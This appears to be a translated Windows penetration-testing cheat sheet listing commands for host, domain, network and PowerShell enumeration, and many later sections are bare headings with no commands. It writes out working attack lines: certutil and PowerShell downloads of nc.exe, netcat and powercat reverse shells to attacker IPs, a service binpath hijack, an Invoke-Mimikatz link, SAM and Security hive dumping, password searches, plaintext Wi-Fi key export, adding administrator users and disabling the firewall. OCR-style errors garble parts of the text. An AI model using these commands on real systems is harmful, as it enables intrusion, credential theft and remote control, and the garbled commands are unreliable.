Windows
Windows
Versions
NT 3.1
Windows NT 3.1 (All)
NT 3.5
Windows NT 3.5 (All)
NT 3.51
Windows NT 3.51 (All)
NT 4.0
Windows NT 4.0 (All)
NT 5.0
Windows 2000 (All)
NT 5.1
Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded)
NT 5.2
Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise)
Windows Home Server
NT 6.0
Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate)
NT 6.1
Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise)
NT 6.2
Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard)
Files
Command
Explanation
%SYSTEMROOT%
Usually C:\Windows
%SYSTEMROOT%\System32\drivers\etc\hosts
DNS Entities
%SYSTEMROOT%\System32\drivers\etc\networks
Network settings
%SYSTEMROOT% system32 config\SAM
Username and password hash
%SYSTEMROOT%\repair\SAM
Copy of SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
Backup copy of SAM
%WINDIR%\system32\config\AppEvent.Evt
Program reports
%WINDIR%\system32\config\SecEvent.Evt
Security reports
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\
Startup path
%USERPROFILE%\Start Menu\Programs\Startup\
Startup path
%SYSTEMROOT%\Prefetch
Path Prefetch (EXE reports)
Launcher paths
For WINDOWS NT 6.1,6.0
For WINDOWS NT 5.2, 5.1, 5.0
FOR WINDOWS 9x
for WINDOWS NT 4.0, 3.51, 3.50
System information commands
Command
Explanation
version
Operating system version
sc query state=all
Show services
tasklist /svc
Show process and services
tasklist /m
Show all processes and dlls
tasklist /S ip /v
Remotely running processes
taskkill /PID pid /F
Forced removal of the process
systeminfo /S ip /U domain\user /P Pwd
Receive system information remotely
reg query \ ip \ RegDomain \ Key /v VALUE
Send a query to the registry, /s=all values
reg query HKLM /f password /t REG_SZ /s
Registry search for passwords
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WSUS address
fsutil fsinfo drives
List of drivers • need admin access
dir /a /s /b c:'.pdf’
Search for all pdf files
dir /a /b c:\windows\kb’
Search for patches
findstr /si password’ .txt I •.xmll •.xls
Search files for passwords
tree /F /A c: tree.txt
List of folders on drive C:
reg save HKLM\Security security.hive
Save security hives inside the file
echo %USERNAME%
Current user
whoami /priv
Current user permissions
command net/domain
net view /domain
Current domain host
net view /domain: [MYDOMAIN]
hosts in [MYDOMAIN]
net user /domain
All users of the current domain
net user user pass /add
Add user
net localgroup "Administrators" user /add
Add user to Administrators
net accounts /domain
Domain password policies
net localgroup "Administrators"
List of Local Admins
net group /domain
List of domain groups
net group "Domain Admins" /domain
List of Admin users in the domain
net group "Domain Controllers" /domain
List of DCs for the current domain
net share
SMB share
net session I find I "\"
List of active SMB sessions
net user user /ACTIVE:yes /domain
Open domain domain
net user user '' newpassword '' /domain
Change domain username and password
net share share c:\share
/GRANT:Everyone,FULL
Shared folder
Remote commands
tasklist /S ip /v
Processes running on ip
systeminfo /S ip /U domain\user /P Pwd
IP information
net share \\ ip
ip environment
net use \\ ip
ip system file
net use z: \\ ip \share password
/user: DOMAIN user
Map drive, specified
credentials
reg add \\ ip \ regkey \ value
Added registry key for ip
sc \\ ip create service
binpath=C:\Windows\System32\x.exe start=auto
Create a remote service
(space after start=)
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe
Copy file from ip to current system by cmd.exe
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe
Shell reverse
nc.exe -lvvp port
Listening on specific port
python3 -m http.server port
Create webserver
xcopy /s \\ ip \dir C:\local
Copy of ip fodder
shutdown /m \\ ip /r /t 0 /f
restart system with ip
Network commands
ipconfig I all
ip settings
ipconfig /displaydns
DNS cache
netstat -ana
Show connection
netstat -anop tcp 1
Create Netstat loop
netstat -ani findstr LISTENING
Ports in use
route print
Route tables
arp -a
Get system MACs (using ARP table)
nslookup, set type=any, ls -d domain
results.txt, exit
Get DNS Zone Xfer
nslookup -type=SRV _www._tcp.url.com
Get Domain SRV lookup (ldap, kerberos, sip)
tftp -I ip GET remotefile
File Transfer in TFTP
netsh wlan show profiles
Profiles stored on the wireless network
netsh firewall set opmode disable
Firewall deactivation ('Old)
netsh wlan export profile folder=. key=clear
wifi extraction in plaintext
netsh interface ip show interfaces
List of IDs/MTUs related to interfaces
netsh interface ip set address local static
ip nmask gw ID
Set IP
netsh interface ip set dns local static ip
DNS server configuration
netsh interface ip set address local dhcp
Set interface to use DHCP
Functional commands
type file
Show file contents
del path \' .• /a /s /q /f
Delete files in current path
find /I ''str'' filename
command I find /c /v ""
List of cmd outputs
at HH:MM file [args] (i.e. at 14:45 cmd /c)
File execution schedule
runas /user: user " file [args]"
Execute file with specific user
restart /r /t 0
Restart
sc stop UsoSvc
Stop the UsoSvc service
sc start UsoSvc
Starting the UsoSvc service
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe"
Change path of executable file by UsoSvc
tr -d '\15\32' win.txt unix.txt
Delete CR & 'Z ('nix)
makecab file
Compression
Wusa.exe /uninstall /kb: ###
Delete patch
cmd.exe "wevtutil qe Application /c:40
/f:text /rd:true"
Using the Event Viewer in the CLI
lusrrngr.msc
Using Local user manager
services.msc
Using Services control panel
taskmgr.exe
Using Task manager
secpool.rnsc
Using Security policy manager
eventvwr.rnsc
Using Event viewer
MISC. commands
Locking the workstation
Disable Windows Firewall
Create port forward (*need admin access)
enable cmd
PSEXEC command
Remote file execution with specific identity information
Execution of command with special hash
Run the command on the remote system
Terminal service (RDP)
Start RDP
RDP tunnel from port 443 (need to restart the terminal service)
Remove network authentication by adding an exception in the firewall
Import task from XML file
WMIC command
wmic [alias] get /?
List of all features
wmic [alias] call /?
Callable method
wmic process list full
process properties
wmic startupwmic service
start wmic service
wmic ntdomain list
Domain and DC information
wmic qfe
List of all patches
wrnic process call create "process_name"
Run process
wmic process where name="process" call
terminate
Delete process
wmic logicaldisk get description,name
Display logical sharing environment
wmic cpu get DataWidth /format:list
Show 32-bit or 64-bit version of the system
wmic service where started = true get name, startname
Show running services
WMIC [alias] [where] [clause]
Run the file in smb with specific identity information
Remove the software
Remote user access
Show processes in real time
Start RDP
The list of times that the user has entered
Search services for unquoted routes
Copy of Volume shadow
POWERSHELL environment
Command
Description
stop-transcript
Stop recording
get-content file
Display the contents of the file
get-help command-examples
Display sample command
get-command ‘string’
Search for cmd
get-service
Show services (stopservice, start-service)
get-wmiobject -class win32 service
Show services with the same identity information
$PSVersionTable
Show powershell version
powershell.exe -version 2.0
Run powershell 2.0 from version 3.0
get-service measure-object
Information returned from the service
get-psdrive
List returned from PSDrives
get-process select -expandproperty name
show names
get-help ‘-parameter credential
Receive identity information
get-wmiobject -list -‘network’
WMI available on the network
(Net.DNS]: :GetnostEntry(” ip “I
Process DNS Lookup
powershell.exe wget “http://10.10.10.10/nc.exe” -outfile “c:\temp\nc.exe”
Download and save the file
poweshell.exe -c “IEX (New-Object System.Net.WebClient).DownloadString(‘http://10.10.10.10:8000/powercat.ps1’); powercat -c 10.10.10.100 -p 4444 -e cmd
reverse loose
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1
Web server with port 8050
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
Use mimikatz
call ps1 files
Import-Module .\Invoke-Mimikatz.ps1
Download and save the file iwr -uri http://10.10.10.10/file -o file.exe
Bypass AMSI
Or
Disable realtimemonitoring
List of all users
List of all domains
Get AD credentials using donotrequirepreauth
Deleting security reports and programs (for SVR01)
Extract the version of the operating system inside the CSV file
List of running services
Using ps drive for permanent sharing
Files written on 8/20
Get file from http
tcp port connections (scanner)
Ping command with 500 millisecond timeout
Basic authentication window
Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700
Run Powershell as
Upload with powershell
Email sender
Activating remote access to powershell (requires identity information)
hostname and ip list for all domains
Download from Powershell from specific path
Display Powershell data
Using powershell to run meterpreter from memory
in the attacking system
Start the listener in the attacking system
On the target system (run powershell(x86))
Encodemeterpreter.ps1 [7]
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using powershell to start meterpreter (second method)
On bt attack box
in the attacking system
Start the listener in the attacking system
In the target system (1: download the shell code, 2: execute)
Identification of vulnerable domains with powerup
Windows registry
operating system information
Product Name
Installation Date
registered name
System boot information
Time zone information (in minutes from UTC)
Map of network drivers
Mounted devices
usb devices
Activation of IP forwarding
Password keys: LSA secret cat certain vpn, autologon, other passwords
Audit policy information
Kernel and user services
software installed in the system
Installed software for the user
Latest documents
The last positions of the user
URLs typed
MRU lists
The last registry key used
Launch paths
Activation of Remote Desktop
Get Windows information with dsquery
List of domain users
List of domain groups domain=victim.com
List of domain administrators
List of user groups
Get the entered user id
List of users who have not been active in the last two weeks
Add user
Delete user
List of domain operating systems
List of site names
List of all subnets in the site
List of services in the site
Get domain servers
DC list of the site
Script writing
Bash script variables must be placed in the form %% For example %%i
Create ping sweep
Create a loop inside the file
domain brute forcer operation
account closing(lockout.bat)
DHCP exhaustion operation
DNS reverse lookup process
Search all the paths to find the files that contain PASS and display the details of that file
Malicious domain simulation (Application for IDS test)
Operation of IE web looper (traffic generator)
Get access to executive services
Spinning Reboot (replace /R with /S to shutdown):
Create a shell using vbs (requires identity information)
Scheduling the task
Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access
Always schedule task [10]
Instructions for working with smb
Log in with a specific user
Login without password
Change password
Show shared route
Show the specified route
Login to Shell
Get users along with password hash
Guess different smb passwords
with metasploit
with medusa
rpcclient commands
entering the system
Show user information
Show users
Show permissions
Change user access
Show printers
NTLM extraction from ntds.dit file
Gather information using SharpHound
Gather information about Sql Server
Obtain AS-REP Roast hash
List of available ips without using nmap
Or
Service identification with Test-WSMan
Enumerate OU’s
Retrieve users in ‘ICS’ OU
SharpHound Collect
Impersonate Token of nuclear\vdadmin (on psexec session)
Last updated